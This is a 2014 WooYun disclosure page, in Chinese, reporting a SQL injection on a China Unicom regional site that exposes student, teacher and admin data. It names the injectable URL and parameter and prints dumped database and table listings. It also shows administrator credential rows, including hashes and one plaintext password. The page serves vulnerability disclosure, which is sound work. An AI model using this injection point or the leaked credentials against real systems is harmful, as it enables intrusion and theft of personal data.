当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061662

漏洞标题:中国联通某地区分站SQL注入致大量用户信息泄漏

相关厂商:中国联通

漏洞作者: PythonPig

提交时间:2014-05-23 19:43

修复时间:2014-07-07 19:43

公开时间:2014-07-07 19:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-23: 细节已通知厂商并且等待厂商处理中
2014-05-28: 厂商已经确认,细节仅向厂商公开
2014-06-07: 细节向核心白帽子及相关领域专家公开
2014-06-17: 细节向普通白帽子公开
2014-06-27: 细节向实习白帽子公开
2014-07-07: 细节向公众公开

简要描述:

中国联通某站存在sql注入
用户信息漏洞~~数量不少
听说联通的漏洞给的rank都不高~~这是为什么勒~?

详细说明:

管理员的用户名密码什么的就不说了,教师的姓名电话密码什么的也不说了,但是一个省的学生的姓名电话 !成绩! 不能不管了,这些学生是祖国的未来,不是嘛?
0x01:先把注入点拿出来:http://202.100.98.9/view.php?db=dongtai&id=5 id存在注入

1副本.jpg

这个站肯定还有别的注入点,好好排查吧
0x02:来看看数据库:

available databases [10]:
[*] information_schema
[*] jxt_blog
[*] moodle
[*] mysql
[*] oscommerce
[*] sms
[*] test
[*] vtigercrm520
[*] vtigercrm530
[*] wbrick


0x03:再来看看表吧,有很多呢~~

Database: vtigercrm520
[447 tables]
+-------------------------------------------+
| com_vtiger_workflow_activatedonce         |
| com_vtiger_workflows                      |
| com_vtiger_workflows_seq                  |
| com_vtiger_workflowtask_queue             |
| com_vtiger_workflowtasks                  |
| com_vtiger_workflowtasks_entitymethod     |
| com_vtiger_workflowtasks_entitymethod_seq |
| com_vtiger_workflowtasks_seq              |
| com_vtiger_workflowtemplates              |
| vtiger_account                            |
| vtiger_accountbillads                     |
| vtiger_accountdepstatus                   |
| vtiger_accountownership                   |
| vtiger_accountrating                      |
| vtiger_accountregion                      |
| vtiger_accountscf                         |
| vtiger_accountshipads                     |
| vtiger_accounttype                        |
| vtiger_accounttype_seq                    |
| vtiger_actionmapping                      |
| vtiger_activity                           |
| vtiger_activity_reminder                  |
| vtiger_activity_reminder_popup            |
| vtiger_activity_view                      |
| vtiger_activity_view_seq                  |
| vtiger_activitycf                         |
| vtiger_activityproductrel                 |
| vtiger_activitytype                       |
| vtiger_activitytype_seq                   |
| vtiger_activsubtype                       |
| vtiger_announcement                       |
| vtiger_assets                             |
| vtiger_assetscf                           |
| vtiger_assetstatus                        |
| vtiger_assetstatus_seq                    |
| vtiger_asterisk                           |
| vtiger_asteriskextensions                 |
| vtiger_asteriskincomingcalls              |
| vtiger_asteriskincomingevents             |
| vtiger_attachments                        |
| vtiger_attachmentsfolder                  |
| vtiger_attachmentsfolder_seq              |
| vtiger_audit_trial                        |
| vtiger_blocks                             |
| vtiger_blocks_seq                         |
| vtiger_businesstype                       |
| vtiger_campaign                           |
| vtiger_campaignaccountrel                 |
| vtiger_campaigncontrel                    |
| vtiger_campaignleadrel                    |
| vtiger_campaignrelstatus                  |
| vtiger_campaignrelstatus_seq              |
| vtiger_campaignscf                        |
| vtiger_campaignstatus                     |
| vtiger_campaignstatus_seq                 |
| vtiger_campaigntype                       |
| vtiger_campaigntype_seq                   |
| vtiger_carrier                            |
| vtiger_carrier_seq                        |
| vtiger_chat_msg                           |
| vtiger_chat_pchat                         |
| vtiger_chat_pvchat                        |
| vtiger_chat_users                         |
| vtiger_cntactivityrel                     |
| vtiger_competitor                         |
| vtiger_contactaddress                     |
| vtiger_contactdetails                     |
| vtiger_contactscf                         |
| vtiger_contactsubdetails                  |
| vtiger_contacttype                        |
| vtiger_contpotentialrel                   |
| vtiger_contract_priority                  |
| vtiger_contract_priority_seq              |
| vtiger_contract_status                    |
| vtiger_contract_status_seq                |
| vtiger_contract_type                      |
| vtiger_contract_type_seq                  |
| vtiger_convertleadmapping                 |
| vtiger_crmentity                          |
| vtiger_crmentity_seq                      |
| vtiger_crmentitynotesrel                  |
| vtiger_crmentityrel                       |
| vtiger_currencies                         |
| vtiger_currencies_seq                     |
| vtiger_currency                           |
| vtiger_currency_info                      |
| vtiger_currency_info_seq                  |
| vtiger_customaction                       |
| vtiger_customerdetails                    |
| vtiger_customerportal_fields              |
| vtiger_customerportal_prefs               |
| vtiger_customerportal_tabs                |
| vtiger_customview                         |
| vtiger_customview_seq                     |
| vtiger_cvadvfilter                        |
| vtiger_cvcolumnlist                       |
| vtiger_cvstdfilter                        |
| vtiger_datashare_grp2grp                  |
| vtiger_datashare_grp2role                 |
| vtiger_datashare_grp2rs                   |
| vtiger_datashare_module_rel               |
| vtiger_datashare_relatedmodule_permission |
| vtiger_datashare_relatedmodules           |
| vtiger_datashare_relatedmodules_seq       |
| vtiger_datashare_role2group               |
| vtiger_datashare_role2role                |
| vtiger_datashare_role2rs                  |
| vtiger_datashare_rs2grp                   |
| vtiger_datashare_rs2role                  |
| vtiger_datashare_rs2rs                    |
| vtiger_date_format                        |
| vtiger_date_format_seq                    |
| vtiger_dealintimation                     |
| vtiger_def_org_field                      |
| vtiger_def_org_share                      |
| vtiger_def_org_share_seq                  |
| vtiger_defaultcv                          |
| vtiger_downloadpurpose                    |
| vtiger_duration_minutes                   |
| vtiger_duration_minutes_seq               |
| vtiger_durationhrs                        |
| vtiger_durationmins                       |
| vtiger_email_access                       |
| vtiger_email_track                        |
| vtiger_emaildetails                       |
| vtiger_emailtemplates                     |
| vtiger_emailtemplates_seq                 |
| vtiger_entityname                         |
| vtiger_evaluationstatus                   |
| vtiger_eventhandler_module                |
| vtiger_eventhandler_module_seq            |
| vtiger_eventhandlers                      |
| vtiger_eventhandlers_seq                  |
| vtiger_eventstatus                        |
| vtiger_eventstatus_seq                    |
| vtiger_expectedresponse                   |
| vtiger_expectedresponse_seq               |
| vtiger_faq                                |
| vtiger_faqcategories                      |
| vtiger_faqcategories_seq                  |
| vtiger_faqcomments                        |
| vtiger_faqstatus                          |
| vtiger_faqstatus_seq                      |
| vtiger_field                              |
| vtiger_field_seq                          |
| vtiger_fieldformulas                      |
| vtiger_fieldmodulerel                     |
| vtiger_files                              |
| vtiger_freetagged_objects                 |
| vtiger_freetags                           |
| vtiger_freetags_seq                       |
| vtiger_glacct                             |
| vtiger_glacct_seq                         |
| vtiger_group2grouprel                     |
| vtiger_group2role                         |
| vtiger_group2rs                           |
| vtiger_groups                             |
| vtiger_headers                            |
| vtiger_home_layout                        |
| vtiger_homedashbd                         |
| vtiger_homedefault                        |
| vtiger_homemodule                         |
| vtiger_homemoduleflds                     |
| vtiger_homerss                            |
| vtiger_homestuff                          |
| vtiger_homestuff_seq                      |
| vtiger_import_maps                        |
| vtiger_industry                           |
| vtiger_industry_seq                       |
| vtiger_inventory_tandc                    |
| vtiger_inventory_tandc_seq                |
| vtiger_inventorynotification              |
| vtiger_inventorynotification_seq          |
| vtiger_inventoryproductrel                |
| vtiger_inventoryshippingrel               |
| vtiger_inventorysubproductrel             |
| vtiger_inventorytaxinfo                   |
| vtiger_inventorytaxinfo_seq               |
| vtiger_invitees                           |
| vtiger_invoice                            |
| vtiger_invoice_recurring_info             |
| vtiger_invoicebillads                     |
| vtiger_invoicecf                          |
| vtiger_invoiceshipads                     |
| vtiger_invoicestatus                      |
| vtiger_invoicestatus_seq                  |
| vtiger_invoicestatushistory               |
| vtiger_language                           |
| vtiger_language_seq                       |
| vtiger_lar                                |
| vtiger_lead_view                          |
| vtiger_lead_view_seq                      |
| vtiger_leadacctrel                        |
| vtiger_leadaddress                        |
| vtiger_leadcontrel                        |
| vtiger_leaddetails                        |
| vtiger_leadpotrel                         |
| vtiger_leadscf                            |
| vtiger_leadsource                         |
| vtiger_leadsource_seq                     |
| vtiger_leadstage                          |
| vtiger_leadstatus                         |
| vtiger_leadstatus_seq                     |
| vtiger_leadsubdetails                     |
| vtiger_licencekeystatus                   |
| vtiger_links                              |
| vtiger_links_seq                          |
| vtiger_loginhistory                       |
| vtiger_mail_accounts                      |
| vtiger_mailmanager_mailattachments        |
| vtiger_mailmanager_mailrecord             |
| vtiger_mailmanager_mailrel                |
| vtiger_mailscanner                        |
| vtiger_mailscanner_actions                |
| vtiger_mailscanner_folders                |
| vtiger_mailscanner_ids                    |
| vtiger_mailscanner_ruleactions            |
| vtiger_mailscanner_rules                  |
| vtiger_manufacturer                       |
| vtiger_manufacturer_seq                   |
| vtiger_mobile_alerts                      |
| vtiger_modcomments                        |
| vtiger_modcommentscf                      |
| vtiger_modentity_num                      |
| vtiger_modentity_num_seq                  |
| vtiger_moduleowners                       |
| vtiger_notebook_contents                  |
| vtiger_notes                              |
| vtiger_notescf                            |
| vtiger_notificationscheduler              |
| vtiger_notificationscheduler_seq          |
| vtiger_opportunity_type                   |
| vtiger_opportunity_type_seq               |
| vtiger_opportunitystage                   |
| vtiger_org_share_action2tab               |
| vtiger_org_share_action_mapping           |
| vtiger_organizationdetails                |
| vtiger_ownernotify                        |
| vtiger_parenttab                          |
| vtiger_parenttabrel                       |
| vtiger_payment_duration                   |
| vtiger_payment_duration_seq               |
| vtiger_pbxmanager                         |
| vtiger_picklist                           |
| vtiger_picklist_seq                       |
| vtiger_picklistvalues_seq                 |
| vtiger_pobillads                          |
| vtiger_portal                             |
| vtiger_portalinfo                         |
| vtiger_poshipads                          |
| vtiger_postatus                           |
| vtiger_postatus_seq                       |
| vtiger_postatushistory                    |
| vtiger_potcompetitorrel                   |
| vtiger_potential                          |
| vtiger_potentialscf                       |
| vtiger_potstagehistory                    |
| vtiger_pricebook                          |
| vtiger_pricebookcf                        |
| vtiger_pricebookproductrel                |
| vtiger_priority                           |
| vtiger_productcategory                    |
| vtiger_productcategory_seq                |
| vtiger_productcf                          |
| vtiger_productcollaterals                 |
| vtiger_productcurrencyrel                 |
| vtiger_products                           |
| vtiger_producttaxrel                      |
| vtiger_profile                            |
| vtiger_profile2field                      |
| vtiger_profile2globalpermissions          |
| vtiger_profile2standardpermissions        |
| vtiger_profile2tab                        |
| vtiger_profile2utility                    |
| vtiger_profile_seq                        |
| vtiger_progress                           |
| vtiger_progress_seq                       |
| vtiger_project                            |
| vtiger_projectcf                          |
| vtiger_projectmilestone                   |
| vtiger_projectmilestonecf                 |
| vtiger_projectmilestonetype               |
| vtiger_projectmilestonetype_seq           |
| vtiger_projectpriority                    |
| vtiger_projectpriority_seq                |
| vtiger_projectstatus                      |
| vtiger_projectstatus_seq                  |
| vtiger_projecttask                        |
| vtiger_projecttaskcf                      |
| vtiger_projecttaskpriority                |
| vtiger_projecttaskpriority_seq            |
| vtiger_projecttaskprogress                |
| vtiger_projecttaskprogress_seq            |
| vtiger_projecttasktype                    |
| vtiger_projecttasktype_seq                |
| vtiger_projecttype                        |
| vtiger_projecttype_seq                    |
| vtiger_purchaseorder                      |
| vtiger_purchaseordercf                    |
| vtiger_quickview                          |
| vtiger_quotes                             |
| vtiger_quotesbillads                      |
| vtiger_quotescf                           |
| vtiger_quotesshipads                      |
| vtiger_quotestage                         |
| vtiger_quotestage_seq                     |
| vtiger_quotestagehistory                  |
| vtiger_rating                             |
| vtiger_rating_seq                         |
| vtiger_recurring_frequency                |
| vtiger_recurring_frequency_seq            |
| vtiger_recurringevents                    |
| vtiger_recurringtype                      |
| vtiger_recurringtype_seq                  |
| vtiger_relatedlists                       |
| vtiger_relatedlists_rb                    |
| vtiger_relatedlists_seq                   |
| vtiger_relcriteria                        |
| vtiger_relcriteria_grouping               |
| vtiger_reminder_interval                  |
| vtiger_reminder_interval_seq              |
| vtiger_report                             |
| vtiger_reportdatefilter                   |
| vtiger_reportfilters                      |
| vtiger_reportfolder                       |
| vtiger_reportmodules                      |
| vtiger_reportsharing                      |
| vtiger_reportsortcol                      |
| vtiger_reportsummary                      |
| vtiger_revenuetype                        |
| vtiger_role                               |
| vtiger_role2picklist                      |
| vtiger_role2profile                       |
| vtiger_role_seq                           |
| vtiger_rss                                |
| vtiger_sales_stage                        |
| vtiger_sales_stage_seq                    |
| vtiger_salesmanactivityrel                |
| vtiger_salesmanattachmentsrel             |
| vtiger_salesmanticketrel                  |
| vtiger_salesorder                         |
| vtiger_salesordercf                       |
| vtiger_salutationtype                     |
| vtiger_salutationtype_seq                 |
| vtiger_seactivityrel                      |
| vtiger_seactivityrel_seq                  |
| vtiger_seattachmentsrel                   |
| vtiger_selectcolumn                       |
| vtiger_selectquery                        |
| vtiger_selectquery_seq                    |
| vtiger_senotesrel                         |
| vtiger_seproductsrel                      |
| vtiger_service                            |
| vtiger_service_usageunit                  |
| vtiger_service_usageunit_seq              |
| vtiger_servicecategory                    |
| vtiger_servicecategory_seq                |
| vtiger_servicecf                          |
| vtiger_servicecontracts                   |
| vtiger_servicecontractscf                 |
| vtiger_seticketsrel                       |
| vtiger_settings_blocks                    |
| vtiger_settings_blocks_seq                |
| vtiger_settings_field                     |
| vtiger_settings_field_seq                 |
| vtiger_sharedcalendar                     |
| vtiger_shippingtaxinfo                    |
| vtiger_shippingtaxinfo_seq                |
| vtiger_smsnotifier                        |
| vtiger_smsnotifier_servers                |
| vtiger_smsnotifier_status                 |
| vtiger_smsnotifiercf                      |
| vtiger_soapservice                        |
| vtiger_sobillads                          |
| vtiger_soshipads                          |
| vtiger_sostatus                           |
| vtiger_sostatus_seq                       |
| vtiger_sostatushistory                    |
| vtiger_status                             |
| vtiger_status_seq                         |
| vtiger_systems                            |
| vtiger_tab                                |
| vtiger_tab_info                           |
| vtiger_taskpriority                       |
| vtiger_taskpriority_seq                   |
| vtiger_taskstatus                         |
| vtiger_taskstatus_seq                     |
| vtiger_taxclass                           |
| vtiger_taxclass_seq                       |
| vtiger_ticketcategories                   |
| vtiger_ticketcategories_seq               |
| vtiger_ticketcf                           |
| vtiger_ticketcomments                     |
| vtiger_ticketpriorities                   |
| vtiger_ticketpriorities_seq               |
| vtiger_ticketseverities                   |
| vtiger_ticketseverities_seq               |
| vtiger_ticketstatus                       |
| vtiger_ticketstatus_seq                   |
| vtiger_ticketstracktime                   |
| vtiger_tmp_read_group_rel_sharing_per     |
| vtiger_tmp_read_group_sharing_per         |
| vtiger_tmp_read_user_rel_sharing_per      |
| vtiger_tmp_read_user_sharing_per          |
| vtiger_tmp_write_group_rel_sharing_per    |
| vtiger_tmp_write_group_sharing_per        |
| vtiger_tmp_write_user_rel_sharing_per     |
| vtiger_tmp_write_user_sharing_per         |
| vtiger_tracker                            |
| vtiger_tracking_unit                      |
| vtiger_tracking_unit_seq                  |
| vtiger_troubletickets                     |
| vtiger_usageunit                          |
| vtiger_usageunit_seq                      |
| vtiger_user2mergefields                   |
| vtiger_user2role                          |
| vtiger_user_module_preferences            |
| vtiger_users                              |
| vtiger_users2group                        |
| vtiger_users_last_import                  |
| vtiger_users_seq                          |
| vtiger_usertype                           |
| vtiger_vendor                             |
| vtiger_vendorcf                           |
| vtiger_vendorcontactrel                   |
| vtiger_version                            |
| vtiger_version_seq                        |
| vtiger_visibility                         |
| vtiger_visibility_seq                     |
| vtiger_wordtemplates                      |
| vtiger_ws_entity                          |
| vtiger_ws_entity_fieldtype                |
| vtiger_ws_entity_fieldtype_seq            |
| vtiger_ws_entity_name                     |
| vtiger_ws_entity_referencetype            |
| vtiger_ws_entity_seq                      |
| vtiger_ws_entity_tables                   |
| vtiger_ws_fieldtype                       |
| vtiger_ws_operation                       |
| vtiger_ws_operation_parameters            |
| vtiger_ws_operation_seq                   |
| vtiger_ws_referencetype                   |
| vtiger_ws_userauthtoken                   |
| vtiger_wsapp                              |
| vtiger_wsapp_handlerdetails               |
| vtiger_wsapp_queuerecords                 |
| vtiger_wsapp_recordmapping                |
+-------------------------------------------+


Database: oscommerce
[50 tables]
+---------------------------------------------+
| action_recorder                             |
| address_book                                |
| address_format                              |
| administrators                              |
| banners                                     |
| banners_history                             |
| categories                                  |
| categories_description                      |
| configuration                               |
| configuration_group                         |
| counter                                     |
| counter_history                             |
| countries                                   |
| currencies                                  |
| customers                                   |
| customers_basket                            |
| customers_basket_attributes                 |
| customers_info                              |
| geo_zones                                   |
| languages                                   |
| manufacturers                               |
| manufacturers_info                          |
| newsletters                                 |
| orders                                      |
| orders_products                             |
| orders_products_attributes                  |
| orders_products_download                    |
| orders_status                               |
| orders_status_history                       |
| orders_total                                |
| products                                    |
| products_attributes                         |
| products_attributes_download                |
| products_description                        |
| products_images                             |
| products_notifications                      |
| products_options                            |
| products_options_values                     |
| products_options_values_to_products_options |
| products_to_categories                      |
| reviews                                     |
| reviews_description                         |
| sec_directory_whitelist                     |
| sessions                                    |
| specials                                    |
| tax_class                                   |
| tax_rates                                   |
| whos_online                                 |
| zones                                       |
| zones_to_geo_zones                          |
+---------------------------------------------+


Database: jxt_blog
[20 tables]
+--------------------------------+
| jxt_nucleus_actionlog          |
| jxt_nucleus_activation         |
| jxt_nucleus_ban                |
| jxt_nucleus_blog               |
| jxt_nucleus_category           |
| jxt_nucleus_comment            |
| jxt_nucleus_config             |
| jxt_nucleus_item               |
| jxt_nucleus_karma              |
| jxt_nucleus_member             |
| jxt_nucleus_plugin             |
| jxt_nucleus_plugin_event       |
| jxt_nucleus_plugin_option      |
| jxt_nucleus_plugin_option_desc |
| jxt_nucleus_skin               |
| jxt_nucleus_skin_desc          |
| jxt_nucleus_team               |
| jxt_nucleus_template           |
| jxt_nucleus_template_desc      |
| jxt_nucleus_tickets            |
+--------------------------------+


0x04:再来看看管理员们吧

Table: administrators
[1 entry]
+----+-----------+------------------------------------+
| id | user_name | user_password                      |
+----+-----------+------------------------------------+
| 1  | admin     | $P$DwG9Szvlf7pcTXpfMz5sL6RamdMzar/ |
+----+-----------+------------------------------------+


Database: oscommerce
Table: administrators
[1 entry]
+----+-----------+------------------------------------+
| id | user_name | user_password                      |
+----+-----------+------------------------------------+
| 1  | admin     | $P$DwG9Szvlf7pcTXpfMz5sL6RamdMzar/ |
+----+-----------+------------------------------------+

ad_admin
[1 entry]
+----+--------+----------+
| id | user   | password |
+----+--------+----------+
| 1  | wbrick | wbrick   |
+----+--------+----------+

Database: sms
Table: oecms_admin
[1 entry]
+---------+----------------------------------+-----------+
| adminid | password                         | adminname |
+---------+----------------------------------+-----------+
| 1       | ae68761b5b545085e794d49979e72ca8 | lyt       |
+---------+----------------------------------+-----------+


0x05:最后来来漏洞的用户数据:

2改.jpg

漏洞证明:

见上

修复方案:

过滤
信息泄漏无小事,希望认真对待
一个省这么多学生的姓名、电话、各科成绩……都可随便查看,不算个小问题
1万多个表,数据量也不算小
管理员的用户名密码什么的,教师的姓名电话密码什么的
联通的漏洞为什么给的rank都很少呢?

版权声明:转载请注明来源 PythonPig@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-28 10:21

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给宁夏分中心处置。

最新状态:

暂无